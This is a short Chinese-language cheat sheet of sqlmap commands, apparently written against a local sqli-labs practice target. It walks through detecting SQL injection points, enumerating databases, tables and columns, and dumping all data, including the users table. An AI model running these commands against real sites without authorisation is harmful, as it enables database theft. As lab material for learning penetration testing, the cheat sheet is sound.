sqlmap常用命令

@ZZHow(ZZHow1024)

一、扫描注入点

1.GET方法,给URL:

  • #探测该url是否存在漏洞
sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"
  • #如果我们已经知道admin这里是注入点的话,可以在其后面加个*来让sqlmap对其注入
sql 复制代码
python sqlmap.py -u "http://www.xx.com/username/admin*"

2.POST方法,给抓包文件:

  • #bp.txt是我们抓取的http的请求包
sql 复制代码
python sqlmap.py -r bp.txt  
  • #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测
sql 复制代码
python sqlmap.py -r bp.txt -p username  

二、爆基本信息自动化

0.查看当前的数据库

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --current-db

1.爆出所有的数据库

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --dbs

2.爆出所有的数据表

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --tables

3.爆出数据库中所有的字段

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --columns

三、爆具体信息自动化

1.爆出数据库security中的所有的表

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables

2.爆出security数据库中users表中的所有的字段

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns

爆出数据库security中的users表中的username字段中的所有数据

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump 

四、爆信数据自动化

1.爆出该数据库中的所有数据

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" --dump-all

2.爆出数据库security中的所有数据

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --dump-all

3.爆出数据库security中的users表中的所有数据

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --dump-all
相关推荐
pandarking1 小时前
[CTF]攻防世界:Shrin(SSTI)
web安全
Z3r4y2 小时前
【代码审计】RuoYi-4.7.1&4.8.1 Thymeleaf模板注入分析
java·web安全·ruoyi·代码审计·thymeleaf
jenchoi4133 小时前
【2025-12-01】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全·npm
白帽黑客-晨哥3 小时前
零基础系统学习渗透测试路线图
学习·网络安全·渗透测试·护网行动·产教融合·湖南省网安基地
咨询QQ276998854 小时前
COMSOL模拟蛇形流道PEMFC:多因素考量下的探索之旅
网络安全
咨询QQ180809514 小时前
探索COMSOL电晕放电现象:离子风生成与作用机制
web安全
-曾牛4 小时前
深入解析 XSS 漏洞:原理、分类与攻防实战
前端·安全·web安全·网络安全·渗透测试·xss·原理解析
XH-hui6 小时前
【打靶日记】VulNyx 之 Responder
linux·网络安全·vulnyx
pandarking6 小时前
[CTF]攻防世界:easytornado
web安全·ctf
vortex56 小时前
基于 Apache 规则拦截目录扫描器请求:实测与配置指南
linux·网络安全·apache